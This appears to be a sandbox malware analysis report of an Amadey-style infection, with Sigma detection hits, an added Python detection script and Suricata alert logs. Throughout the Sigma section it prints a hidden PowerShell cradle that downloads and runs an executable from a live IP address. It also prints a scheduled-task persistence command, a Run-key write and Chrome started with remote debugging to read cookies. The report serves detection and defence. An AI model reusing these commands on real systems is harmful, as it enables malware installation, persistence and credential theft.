Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 8020, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 8132, ProcessName: powershell.exe

Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta, CommandLine: mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Users\user\Desktop\aV2ffcSuKl.exe", ParentImage: C:\Users\user\Desktop\aV2ffcSuKl.exe, ParentProcessId: 7952, ParentProcessName: aV2ffcSuKl.exe, ProcessCommandLine: mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta, ProcessId: 8020, ProcessName: mshta.exe

Source: Process started; Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe, ParentProcessId: 4156, ParentProcessName: ILqcVeT.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", ProcessId: 7972, ProcessName: chrome.exe

Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe, ProcessId: 2188, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\132fd7f0ed.exe

Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8132, TargetFilename: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE

Source: Process started; Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 8020, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 8132, ProcessName: powershell.exe
                                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 8020, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 8132, ProcessName: powershell.exe
                                                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 52.60.87.163, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\ProgramData\jnxnee\benskvi.exe, Initiated: true, ProcessId: 3108, Protocol: tcp, SourceIp: 192.168.2.11, SourceIsIpv6: false, SourcePort: 49803
                                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn bseb5ma1dDD /tr "mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: schtasks /create /tn bseb5ma1dDD /tr "mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn bseb5ma1dDD /tr "mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta" /sc minute /mo 25 /ru "user" /f, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8000, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn bseb5ma1dDD /tr "mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 8076, ProcessName: schtasks.exe
                                                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 8020, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 8132, ProcessName: powershell.exe
                                                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 8020, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 8132, ProcessName: powershell.exe
                                                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", CommandLine: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7008, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", ProcessId: 4772, ProcessName: powershell.exe
                                                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7092, ProcessName: svchost.exe

                                                Data Obfuscation

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 8020, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 8132, ProcessName: powershell.exe
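The Sigma hits above describe one chain: the dropper runs mshta on an HTA in the user's Temp folder, the HTA spawns a hidden PowerShell that downloads http://176.113.115.7/mine/random.exe and starts it, schtasks re-runs the HTA every 25 minutes, a second payload starts Chrome with --remote-debugging-port to read its cookies through DevTools, and Amadey's rapes.exe writes a Run key. The detection logic below is an added example, not Joe Sandbox code and not part of the sample; its EVENTS list is constructed from the report's own command lines, parent images and registry/file targets, with Sysmon-style field names as the report prints them. One detail worth encoding: the PowerShell concatenates $env:temp with the file name without a path separator, so the file-creation event shows the download landing at ...\AppData\Local\TempP9Z71...EXE rather than inside Temp; the rules therefore key on the AppData prefix and not on a \Temp\ component.

```python
"""Process-chain detections for the behaviour recorded in this report.

Added example, not Joe Sandbox code and not part of the analysed sample.
EVENTS is constructed from the Sigma hits on this page (values copied from
the report; Sysmon-style EventID 1 = process create, 11 = file create,
13 = registry value set).
"""
import re
from typing import Dict, List, Tuple

EVENTS: List[Dict[str, str]] = [
    {"EventID": "1", "Image": r"C:\Windows\SysWOW64\mshta.exe",
     "CommandLine": r"mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta",
     "ParentImage": r"C:\Users\user\Desktop\aV2ffcSuKl.exe"},
    {"EventID": "1", "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": (r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden '
                     r"$d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';"
                     r"(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);"
                     r"Start-Process $d;"),
     "ParentImage": r"C:\Windows\SysWOW64\mshta.exe"},
    {"EventID": "1", "Image": r"C:\Windows\SysWOW64\schtasks.exe",
     "CommandLine": r'schtasks /create /tn bseb5ma1dDD /tr "mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta" /sc minute /mo 25 /ru "user" /f',
     "ParentImage": r"C:\Windows\SysWOW64\cmd.exe"},
    {"EventID": "1", "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""',
     "ParentImage": r"C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe"},
    {"EventID": "13", "Image": r"C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe",
     "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\132fd7f0ed.exe",
     "Details": r"C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exe"},
    {"EventID": "11", "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE"},
    # Constructed benign control (not from the report): interactive PowerShell from Explorer.
    {"EventID": "1", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"',
     "ParentImage": r"C:\Windows\explorer.exe"},
]

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe"}
# Anything under a user's AppData, with or without a \Temp\ component after it.
USER_APPDATA = re.compile(r"\\users\\[^\\]+\\appdata\\", re.I)
DOWNLOAD = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b", re.I)
EXECUTE = re.compile(r"start-process|invoke-expression|\biex\b|invoke-item|\bsaps\b", re.I)
URL = re.compile(r"https?://[^'\"\s)]+", re.I)


def basename(path: str) -> str:
    """Last path component, lower-cased, for image/parent comparisons."""
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev: Dict[str, str]) -> List[str]:
    """Return the detections that fire for one event (empty list if none)."""
    findings: List[str] = []
    eid = ev["EventID"]
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    if eid == "1":
        # Script host executing content from a user-writable location.
        if image in SCRIPT_HOSTS and USER_APPDATA.search(cmd):
            findings.append(f"{image} running a script from a user-writable path")
        # Download-and-execute cradle whose parent is a script host.
        if image == "powershell.exe" and parent in SCRIPT_HOSTS and DOWNLOAD.search(cmd) and EXECUTE.search(cmd):
            m = URL.search(cmd)
            findings.append(f"download-and-execute cradle spawned by {parent}: {m.group(0) if m else 'url not found'}")
        # Scheduled task whose action is itself a script-host launcher.
        if image == "schtasks.exe" and re.search(r"/create\b", cmd, re.I) and \
                re.search(r'/tr\s+"?(mshta|wscript|cscript|powershell|rundll32|regsvr32)\b', cmd, re.I):
            findings.append("scheduled task persisting a script-host launcher")
        # Browser opened with a DevTools port by something that is not a browser or the shell.
        if image in BROWSERS and "--remote-debugging-port" in cmd.lower() and parent not in BROWSERS | {"explorer.exe"}:
            findings.append(f"{image} started with remote debugging by {parent} (cookie access via DevTools)")
    elif eid == "13":
        if "\\currentversion\\run\\" in ev.get("TargetObject", "").lower() and USER_APPDATA.search(ev.get("Details", "")):
            findings.append("Run key pointing at an executable under AppData")
    elif eid == "11":
        target = ev.get("TargetFilename", "")
        if image == "powershell.exe" and target.lower().endswith(".exe") and USER_APPDATA.search(target):
            findings.append(f"powershell wrote an executable under AppData: {target}")
    return findings


def run_detections(events: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    """(event index, finding) pairs for every rule that fires over the event stream."""
    return [(i, f) for i, ev in enumerate(events) for f in check_event(ev)]


if __name__ == "__main__":
    for idx, finding in run_detections(EVENTS):
        print(f"event {idx}: {finding}")
```

The browser rule needs an allow-list in production: Selenium, Puppeteer and similar test drivers also start Chrome with --remote-debugging-port, but their parent is a known automation binary, not an executable dropped under Temp as it is here.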
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-06T08:10:58.872169+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 59943 | 104.21.80.1 | 443 | TCP
2025-03-06T08:11:01.455608+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 64532 | 104.21.80.1 | 443 | TCP
2025-03-06T08:11:05.348829+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 64586 | 104.21.80.1 | 443 | TCP
2025-03-06T08:11:09.589956+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 64662 | 104.21.80.1 | 443 | TCP
2025-03-06T08:11:13.746062+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 64756 | 104.21.80.1 | 443 | TCP
2025-03-06T08:11:17.035737+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 64821 | 104.21.80.1 | 443 | TCP
2025-03-06T08:11:17.506679+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 64823 | 23.197.127.21 | 443 | TCP
2025-03-06T08:11:22.001493+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53736 | 104.21.24.225 | 443 | TCP
2025-03-06T08:11:22.501727+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53747 | 104.21.80.1 | 443 | TCP
2025-03-06T08:11:24.572361+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53889 | 104.21.24.225 | 443 | TCP
2025-03-06T08:11:26.211732+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53928 | 104.21.48.1 | 443 | TCP
2025-03-06T08:11:27.470136+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53950 | 104.21.24.225 | 443 | TCP
2025-03-06T08:11:27.889618+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53957 | 104.21.80.1 | 443 | TCP
2025-03-06T08:11:28.828094+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 50532 | 104.21.48.1 | 443 | TCP
2025-03-06T08:11:30.423814+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 50549 | 104.21.24.225 | 443 | TCP
2025-03-06T08:11:31.777050+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 50574 | 104.21.48.1 | 443 | TCP
2025-03-06T08:11:33.146362+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 50611 | 104.21.24.225 | 443 | TCP
2025-03-06T08:11:34.573818+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 50636 | 104.21.48.1 | 443 | TCP
2025-03-06T08:11:35.951803+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 50654 | 104.21.24.225 | 443 | TCP
2025-03-06T08:11:37.407242+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 50676 | 104.21.48.1 | 443 | TCP
2025-03-06T08:11:39.107647+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 50703 | 104.21.24.225 | 443 | TCP
2025-03-06T08:11:41.153251+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 50732 | 104.21.48.1 | 443 | TCP
2025-03-06T08:11:43.141219+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 50776 | 104.21.48.1 | 443 | TCP
2025-03-06T08:11:43.420367+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 50783 | 104.21.24.225 | 443 | TCP
2025-03-06T08:11:44.321777+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 50804 | 104.21.48.1 | 443 | TCP
2025-03-06T08:11:45.672242+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 50839 | 104.21.48.1 | 443 | TCP
2025-03-06T08:11:48.924800+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 50902 | 104.21.48.1 | 443 | TCP
2025-03-06T08:11:50.479791+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 50951 | 104.21.48.1 | 443 | TCP
2025-03-06T08:11:53.135867+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 50998 | 104.21.48.1 | 443 | TCP
2025-03-06T08:11:56.022985+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 51039 | 104.21.48.1 | 443 | TCP
2025-03-06T08:11:59.155904+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 51082 | 104.21.48.1 | 443 | TCP
2025-03-06T08:12:02.375781+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 51118 | 104.21.48.1 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-06T08:10:59.581220+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 59943 | 104.21.80.1 | 443 | TCP
2025-03-06T08:11:02.927197+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 64532 | 104.21.80.1 | 443 | TCP
2025-03-06T08:11:22.802782+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 53736 | 104.21.24.225 | 443 | TCP
2025-03-06T08:11:25.453470+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 53889 | 104.21.24.225 | 443 | TCP
2025-03-06T08:11:27.043208+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 53928 | 104.21.48.1 | 443 | TCP
2025-03-06T08:11:28.758723+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 53957 | 104.21.80.1 | 443 | TCP
2025-03-06T08:11:29.700882+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 50532 | 104.21.48.1 | 443 | TCP
2025-03-06T08:11:43.977267+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 50776 | 104.21.48.1 | 443 | TCP
2025-03-06T08:11:44.321253+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 50783 | 104.21.24.225 | 443 | TCP
2025-03-06T08:11:46.583683+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 50839 | 104.21.48.1 | 443 | TCP
2025-03-06T08:11:49.797302+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 50902 | 104.21.48.1 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-06T08:10:59.581220+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.11 | 59943 | 104.21.80.1 | 443 | TCP
2025-03-06T08:11:22.802782+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.11 | 53736 | 104.21.24.225 | 443 | TCP
2025-03-06T08:11:27.043208+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.11 | 53928 | 104.21.48.1 | 443 | TCP
2025-03-06T08:11:43.977267+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.11 | 50776 | 104.21.48.1 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-06T08:10:58.872169+0100 | 2060386 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 59943 | 104.21.80.1 | 443 | TCP
2025-03-06T08:11:01.455608+0100 | 2060386 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 64532 | 104.21.80.1 | 443 | TCP
2025-03-06T08:11:05.348829+0100 | 2060386 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 64586 | 104.21.80.1 | 443 | TCP
2025-03-06T08:11:09.589956+0100 | 2060386 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 64662 | 104.21.80.1 | 443 | TCP
2025-03-06T08:11:13.746062+0100 | 2060386 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 64756 | 104.21.80.1 | 443 | TCP
2025-03-06T08:11:17.035737+0100 | 2060386 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 64821 | 104.21.80.1 | 443 | TCP
2025-03-06T08:11:22.501727+0100 | 2060386 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 53747 | 104.21.80.1 | 443 | TCP
2025-03-06T08:11:27.889618+0100 | 2060386 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 53957 | 104.21.80.1 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-06T08:11:15.392169+0100 | 2060410 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 56056 | 1.1.1.1 | 53 | UDP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-06T08:11:15.500878+0100 | 2060412 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 49380 | 1.1.1.1 | 53 | UDP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-06T08:10:57.054256+0100 | 2060385 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 58494 | 1.1.1.1 | 53 | UDP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
